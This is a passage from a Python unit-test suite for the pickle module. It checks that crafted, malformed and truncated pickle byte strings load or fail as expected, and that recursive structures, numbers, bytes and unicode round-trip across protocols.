# From Python 2: pickle.dumps('a\x00\xa0', protocol=1)
self.assertEqual(self.loads(b'U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=2)
self.assertEqual(self.loads(b'\x80\x02U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
def test_load_python2_unicode_as_str(self):
# From Python 2: pickle.dumps(u'π', protocol=0)
self.assertEqual(self.loads(b'V\\u03c0\n.',
encoding='bytes'), 'π')
# From Python 2: pickle.dumps(u'π', protocol=1)
self.assertEqual(self.loads(b'X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
# From Python 2: pickle.dumps(u'π', protocol=2)
self.assertEqual(self.loads(b'\x80\x02X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
def test_load_long_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('x' * 300, protocol=1)
self.assertEqual(self.loads(pickle.BINSTRING +
struct.pack("<I", 300) +
b'x' * 300 + pickle.STOP,
encoding='bytes'), b'x' * 300)
def test_constants(self):
self.assertIsNone(self.loads(b'N.'))
self.assertIs(self.loads(b'\x88.'), True)
self.assertIs(self.loads(b'\x89.'), False)
self.assertIs(self.loads(b'I01\n.'), True)
self.assertIs(self.loads(b'I00\n.'), False)
def test_empty_bytestring(self):
# issue 11286
empty = self.loads(b'\x80\x03U\x00q\x00.', encoding='koi8-r')
self.assertEqual(empty, '')
def test_short_binbytes(self):
dumped = b'\x80\x03C\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binbytes(self):
dumped = b'\x80\x03B\x04\x00\x00\x00\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
@requires_32b
def test_negative_32b_binbytes(self):
# On 32-bit builds, a BINBYTES of 2**31 or more is refused
dumped = b'\x80\x03B\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_negative_32b_binunicode(self):
# On 32-bit builds, a BINUNICODE of 2**31 or more is refused
dumped = b'\x80\x03X\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_short_binunicode(self):
dumped = b'\x80\x04\x8c\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_misc_get(self):
self.check_unpickling_error(pickle.UnpicklingError, b'g0\np0')
self.check_unpickling_error(pickle.UnpicklingError, b'jens:')
self.check_unpickling_error(pickle.UnpicklingError, b'hens:')
self.assert_is_copy([(100,), (100,)],
self.loads(b'((Kdtp0\nh\x00l.))'))
def test_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_bytearray8(self):
dumped = b'\x80\x05\x96\x03\x00\x00\x00\x00\x00\x00\x00xxx.'
self.assertEqual(self.loads(dumped), bytearray(b'xxx'))
@requires_32b
def test_large_32b_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_bytearray8(self):
dumped = b'\x80\x05\x96\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_get(self):
pickled = b'((lp100000\ng100000\nt.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_binget(self):
pickled = b'(]q\xffh\xfft.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_long_binget(self):
pickled = b'(]r\x00\x00\x01\x00j\x00\x00\x01\x00t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_dup(self):
pickled = b'((l2t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_negative_put(self):
# Issue #12847
dumped = b'Va\np-1\n.'
self.check_unpickling_error(ValueError, dumped)
@requires_32b
def test_negative_32b_binput(self):
# Issue #12847
dumped = b'\x80\x03X\x01\x00\x00\x00ar\xff\xff\xff\xff.'
self.check_unpickling_error(ValueError, dumped)
def test_badly_escaped_string(self):
self.check_unpickling_error(ValueError, b"S'\\'\n.")
def test_badly_quoted_string(self):
# Issue #17710
badpickles = [b"S'\n.",
b'S"\n.',
b'S\' \n.',
b'S" \n.',
b'S\'"\n.',
b'S"\'\n.',
b"S' ' \n.",
b'S" " \n.',
b"S ''\n.",
b'S ""\n.',
b'S \n.',
b'S\n.',
b'S.']
for p in badpickles:
self.check_unpickling_error(pickle.UnpicklingError, p)
def test_correctly_quoted_string(self):
goodpickles = [(b"S''\n.", ''),
(b'S""\n.', ''),
(b'S"\\n"\n.', '\n'),
(b"S'\\n'\n.", '\n')]
for p, expected in goodpickles:
self.assertEqual(self.loads(p), expected)
def test_frame_readline(self):
pickled = b'\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00I42\n.'
# 0: \x80 PROTO 4
# 2: \x95 FRAME 5
# 11: I INT 42
# 15: . STOP
self.assertEqual(self.loads(pickled), 42)
def test_compat_unpickle(self):
# xrange(1, 7)
pickled = b'\x80\x02c__builtin__\nxrange\nK\x01K\x07K\x01\x87R.'
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), range)
self.assertEqual(unpickled, range(1, 7))
self.assertEqual(list(unpickled), [1, 2, 3, 4, 5, 6])
# reduce
pickled = b'\x80\x02c__builtin__\nreduce\n.'
self.assertIs(self.loads(pickled), functools.reduce)
# whichdb.whichdb
pickled = b'\x80\x02cwhichdb\nwhichdb\n.'
self.assertIs(self.loads(pickled), dbm.whichdb)
# Exception(), StandardError()
for name in (b'Exception', b'StandardError'):
pickled = (b'\x80\x02cexceptions\n' + name + b'\nU\x03ugh\x85R.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), Exception)
self.assertEqual(str(unpickled), 'ugh')
# UserDict.UserDict({1: 2}), UserDict.IterableUserDict({1: 2})
for name in (b'UserDict', b'IterableUserDict'):
pickled = (b'\x80\x02(cUserDict\n' + name +
b'\no}U\x04data}K\x01K\x02ssb.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), collections.UserDict)
self.assertEqual(unpickled, collections.UserDict({1: 2}))
def test_bad_reduce(self):
self.assertEqual(self.loads(b'cbuiltins\nint\n)R.'), 0)
self.check_unpickling_error(TypeError, b'N)R.')
self.check_unpickling_error(TypeError, b'cbuiltins\nint\nNR.')
def test_bad_newobj(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)\x81.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)\x81.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN\x81.')
def test_bad_newobj_ex(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)}\x92.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\n)N\x92.')
def test_bad_stack(self):
badpickles = [
b'.', # STOP
b'0', # POP
b'1', # POP_MARK
b'2', # DUP
b'(2',
b'R', # REDUCE
b')R',
b'a', # APPEND
b'Na',
b'b', # BUILD
b'Nb',
b'd', # DICT
b'e', # APPENDS
b'(e',
b'ibuiltins\nlist\n', # INST
b'l', # LIST
b'o', # OBJ
b'(o',
b'p1\n', # PUT
b'q\x00', # BINPUT
b'r\x00\x00\x00\x00', # LONG_BINPUT
b's', # SETITEM
b'Ns',
b'NNs',
b't', # TUPLE
b'u', # SETITEMS
b'(u',
b'}(Nu',
b'\x81', # NEWOBJ
b')\x81',
b'\x85', # TUPLE1
b'\x86', # TUPLE2
b'N\x86',
b'\x87', # TUPLE3
b'N\x87',
b'NN\x87',
b'\x90', # ADDITEMS
b'(\x90',
b'\x91', # FROZENSET
b'\x92', # NEWOBJ_EX
b')}\x92',
b'\x93', # STACK_GLOBAL
b'Vlist\n\x93',
b'\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_bad_mark(self):
badpickles = [
b'N(.', # STOP
b'N(2', # DUP
b'cbuiltins\nlist\n)(R', # REDUCE
b'cbuiltins\nlist\n()R',
b']N(a', # APPEND
# BUILD
b'cbuiltins\nValueError\n)R}(b',
b'cbuiltins\nValueError\n)R(}b',
b'(Nd', # DICT
b'N(p1\n', # PUT
b'N(q\x00', # BINPUT
b'N(r\x00\x00\x00\x00', # LONG_BINPUT
b'}NN(s', # SETITEM
b'}N(Ns',
b'}(NNs',
b'}((u', # SETITEMS
b'cbuiltins\nlist\n)(\x81', # NEWOBJ
b'cbuiltins\nlist\n()\x81',
b'N(\x85', # TUPLE1
b'NN(\x86', # TUPLE2
b'N(N\x86',
b'NNN(\x87', # TUPLE3
b'NN(N\x87',
b'N(NN\x87',
b']((\x90', # ADDITEMS
# NEWOBJ_EX
b'cbuiltins\nlist\n)}(\x92',
b'cbuiltins\nlist\n)(}\x92',
b'cbuiltins\nlist\n()}\x92',
# STACK_GLOBAL
b'Vbuiltins\n(Vlist\n\x93',
b'Vbuiltins\nVlist\n(\x93',
b'N(\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_truncated_data(self):
self.check_unpickling_error(EOFError, b'')
self.check_unpickling_error(EOFError, b'N')
badpickles = [
b'B', # BINBYTES
b'B\x03\x00\x00',
b'B\x03\x00\x00\x00',
b'B\x03\x00\x00\x00ab',
b'C', # SHORT_BINBYTES
b'C\x03',
b'C\x03ab',
b'F', # FLOAT
b'F0.0',
b'F0.00',
b'G', # BINFLOAT
b'G\x00\x00\x00\x00\x00\x00\x00',
b'I', # INT
b'I0',
b'J', # BININT
b'J\x00\x00\x00',
b'K', # BININT1
b'L', # LONG
b'L0',
b'L10',
b'L0L',
b'L10L',
b'M', # BININT2
b'M\x00',
# b'P', # PERSID
# b'Pabc',
b'S', # STRING
b"S'abc'",
b'T', # BINSTRING
b'T\x03\x00\x00',
b'T\x03\x00\x00\x00',
b'T\x03\x00\x00\x00ab',
b'U', # SHORT_BINSTRING
b'U\x03',
b'U\x03ab',
b'V', # UNICODE
b'Vabc',
b'X', # BINUNICODE
b'X\x03\x00\x00',
b'X\x03\x00\x00\x00',
b'X\x03\x00\x00\x00ab',
b'(c', # GLOBAL
b'(cbuiltins',
b'(cbuiltins\n',
b'(cbuiltins\nlist',
b'Ng', # GET
b'Ng0',
b'(i', # INST
b'(ibuiltins',
b'(ibuiltins\n',
b'(ibuiltins\nlist',
b'Nh', # BINGET
b'Nj', # LONG_BINGET
b'Nj\x00\x00\x00',
b'Np', # PUT
b'Np0',
b'Nq', # BINPUT
b'Nr', # LONG_BINPUT
b'Nr\x00\x00\x00',
b'\x80', # PROTO
b'\x82', # EXT1
b'\x83', # EXT2
b'\x84\x01',
b'\x84', # EXT4
b'\x84\x01\x00\x00',
b'\x8a', # LONG1
b'\x8b', # LONG4
b'\x8b\x00\x00\x00',
b'\x8c', # SHORT_BINUNICODE
b'\x8c\x03',
b'\x8c\x03ab',
b'\x8d', # BINUNICODE8
b'\x8d\x03\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x8e', # BINBYTES8
b'\x8e\x03\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x96', # BYTEARRAY8
b'\x96\x03\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x95', # FRAME
b'\x95\x02\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00N',
]
for p in badpickles:
self.check_unpickling_error(self.truncated_errors, p)
@threading_helper.reap_threads
@threading_helper.requires_working_threading()
def test_unpickle_module_race(self):
# https://bugs.python.org/issue34572
locker_module = dedent("""
import threading
barrier = threading.Barrier(2)
""")
locking_import_module = dedent("""
import locker
locker.barrier.wait()
class ToBeUnpickled(object):
pass
""")
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
with open(os.path.join(TESTFN, "locker.py"), "wb") as f:
f.write(locker_module.encode('utf-8'))
with open(os.path.join(TESTFN, "locking_import.py"), "wb") as f:
f.write(locking_import_module.encode('utf-8'))
self.addCleanup(forget, "locker")
self.addCleanup(forget, "locking_import")
import locker
pickle_bytes = (
b'\x80\x03clocking_import\nToBeUnpickled\nq\x00)\x81q\x01.')
# Then try to unpickle two of these simultaneously
# One of them will cause the module import, and we want it to block
# until the other one either:
# - fails (before the patch for this issue)
# - blocks on the import lock for the module, as it should
results = []
barrier = threading.Barrier(3)
def t():
# This ensures the threads have all started
# presumably barrier release is faster than thread startup
barrier.wait()
results.append(pickle.loads(pickle_bytes))
t1 = threading.Thread(target=t)
t2 = threading.Thread(target=t)
t1.start()
t2.start()
barrier.wait()
# a delay could be inserted here
locker.barrier.wait()
t1.join()
t2.join()
from locking_import import ToBeUnpickled
self.assertEqual(
[type(x) for x in results],
[ToBeUnpickled] * 2)
class AbstractPickleTests:
# Subclass must define self.dumps, self.loads.
optimized = False
_testdata = AbstractUnpickleTests._testdata
def setUp(self):
pass
assert_is_copy = AbstractUnpickleTests.assert_is_copy
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assert_is_copy(expected, got)
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def _test_recursive_list(self, cls, aslist=identity, minprotocol=0):
# List containing itself.
l = cls()
l.append(l)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
def test_recursive_list(self):
self._test_recursive_list(list)
def test_recursive_list_subclass(self):
self._test_recursive_list(MyList, minprotocol=2)
def test_recursive_list_like(self):
self._test_recursive_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_tuple_and_list(self, cls, aslist=identity, minprotocol=0):
# Tuple containing a list containing the original tuple.
t = (cls(),)
t[0].append(t)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = aslist(x[0])
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
# List containing a tuple containing the original list.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(y[0], tuple)
self.assertEqual(len(y[0]), 1)
self.assertIs(y[0][0], x)
def test_recursive_tuple_and_list(self):
self._test_recursive_tuple_and_list(list)
def test_recursive_tuple_and_list_subclass(self):
self._test_recursive_tuple_and_list(MyList, minprotocol=2)
def test_recursive_tuple_and_list_like(self):
self._test_recursive_tuple_and_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_dict(self, cls, asdict=identity, minprotocol=0):
# Dict containing itself.
d = cls()
d[1] = d
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y.keys()), [1])
self.assertIs(y[1], x)
def test_recursive_dict(self):
self._test_recursive_dict(dict)
def test_recursive_dict_subclass(self):
self._test_recursive_dict(MyDict, minprotocol=2)
def test_recursive_dict_like(self):
self._test_recursive_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing the original tuple.
t = (cls(),)
t[0][1] = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(list(y), [1])
self.assertIs(y[1], x)
# Dict containing a tuple containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y), [1])
self.assertIsInstance(y[1], tuple)
self.assertEqual(len(y[1]), 1)
self.assertIs(y[1][0], x)
def test_recursive_tuple_and_dict(self):
self._test_recursive_tuple_and_dict(dict)
def test_recursive_tuple_and_dict_subclass(self):
self._test_recursive_tuple_and_dict(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like(self):
self._test_recursive_tuple_and_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_dict_key(self, cls, asdict=identity, minprotocol=0):
# Dict containing an immutable object (as key) containing the original
# dict.
d = cls()
d[K(d)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y.keys()), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
def test_recursive_dict_key(self):
self._test_recursive_dict_key(dict)
def test_recursive_dict_subclass_key(self):
self._test_recursive_dict_key(MyDict, minprotocol=2)
def test_recursive_dict_like_key(self):
self._test_recursive_dict_key(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict_key(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing an immutable object (as key)
# containing the original tuple.
t = (cls(),)
t[0][K(t)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
# Dict containing an immutable object (as key) containing a tuple
# containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value[0], x)
def test_recursive_tuple_and_dict_key(self):
self._test_recursive_tuple_and_dict_key(dict)
def test_recursive_tuple_and_dict_subclass_key(self):
self._test_recursive_tuple_and_dict_key(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like_key(self):
self._test_recursive_tuple_and_dict_key(REX_seven, asdict=lambda x: x.table)
def test_recursive_set(self):
# Set containing an immutable object containing the original set.
y = set()
y.add(K(y))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
# Immutable object containing a set containing the original object.
y, = y
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, K)
self.assertIsInstance(x.value, set)
self.assertEqual(len(x.value), 1)
self.assertIs(list(x.value)[0], x)
def test_recursive_inst(self):
# Mutable object containing itself.
i = Object()
i.attr = i
for proto in protocols:
s = self.dumps(i, proto)
x = self.loads(s)
self.assertIsInstance(x, Object)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = Object()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertIs(x[0].attr[1], x)
def _test_recursive_collection_and_inst(self, factory):
# Mutable object containing a collection containing the original
# object.
o = Object()
o.attr = factory([o])
t = type(o.attr)
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x.attr, t)
self.assertEqual(len(x.attr), 1)
self.assertIsInstance(list(x.attr)[0], Object)
self.assertIs(list(x.attr)[0], x)
# Collection containing a mutable object containing the original
# collection.
o = o.attr
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x, t)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], Object)
self.assertIs(list(x)[0].attr, x)
def test_recursive_list_and_inst(self):
self._test_recursive_collection_and_inst(list)
def test_recursive_tuple_and_inst(self):
self._test_recursive_collection_and_inst(tuple)
def test_recursive_dict_and_inst(self):
self._test_recursive_collection_and_inst(dict.fromkeys)
def test_recursive_set_and_inst(self):
self._test_recursive_collection_and_inst(set)
def test_recursive_frozenset_and_inst(self):
self._test_recursive_collection_and_inst(frozenset)
def test_recursive_list_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyList)
def test_recursive_tuple_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyTuple)
def test_recursive_dict_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyDict.fromkeys)
def test_recursive_set_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MySet)
def test_recursive_frozenset_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyFrozenSet)
def test_recursive_inst_state(self):
# Mutable object containing itself.
y = REX_state()
y.state = y
for proto in protocols:
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIs(x.state, x)
def test_recursive_tuple_and_inst_state(self):
# Tuple containing a mutable object containing the original tuple.
t = (REX_state(),)
t[0].state = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], REX_state)
self.assertIs(x[0].state, x)
# Mutable object containing a tuple containing the object.
t, = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIsInstance(x.state, tuple)
self.assertEqual(len(x.state), 1)
self.assertIs(x.state[0], x)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>',
# surrogates
'<\udc80>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assert_is_copy(u, u2)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assert_is_copy(t, t2)
def test_bytes(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i, i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
def test_bytearray(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps(b, proto)
bb = self.loads(p)
self.assertIsNot(bb, b)
self.assert_is_copy(b, bb)
if proto <= 3:
# bytearray is serialized using a global reference
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.GLOBAL, p))
elif proto == 4:
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.STACK_GLOBAL, p))
elif proto == 5:
self.assertNotIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.BYTEARRAY8, p))
def test_bytearray_memoization_bug(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps((b, b), proto)
b1, b2 = self.loads(p)
self.assertIs(b1, b2)
def test_ints(self):
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assert_is_copy(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
# assert_is_copy is very expensive here as it precomputes
# a failure message by computing the repr() of n and got, so
# we just do the check ourselves.
self.assertIs(type(got), int)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assert_is_copy(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
# make sure that floats are formatted in a locale-independent way with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
for proto in protocols:
inst = AAA()
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, REDUCE_A)
def test_getinitargs(self):
for proto in protocols:
inst = initarg(1, 2)
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assert_is_copy(inst, loaded)
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_dynamic_class(self):
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
def test_ellipsis(self):
for proto in protocols:
s = self.dumps(..., proto)
u = self.loads(s)
self.assertIs(..., u)
def test_notimplemented(self):
for proto in protocols:
s = self.dumps(NotImplemented, proto)
u = self.loads(s)
self.assertIs(NotImplemented, u)
def test_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
for proto in protocols:
s = self.dumps(type(singleton), proto)
u = self.loads(s)
self.assertIs(type(singleton), u)
# Tests for protocol 2
def test_proto(self):
for proto in protocols:
pickled = self.dumps(None, proto)
if proto >= 2:
proto_header = pickle.PROTO + bytes([proto])
self.assertTrue(pickled.startswith(proto_header))
else:
self.assertEqual(count_opcode(pickle.PROTO, pickled), 0)
oob = protocols[-1] + 1 # a future protocol
build_none = pickle.NONE + pickle.STOP
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as err:
self.assertIn("unsupported pickle protocol", str(err))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
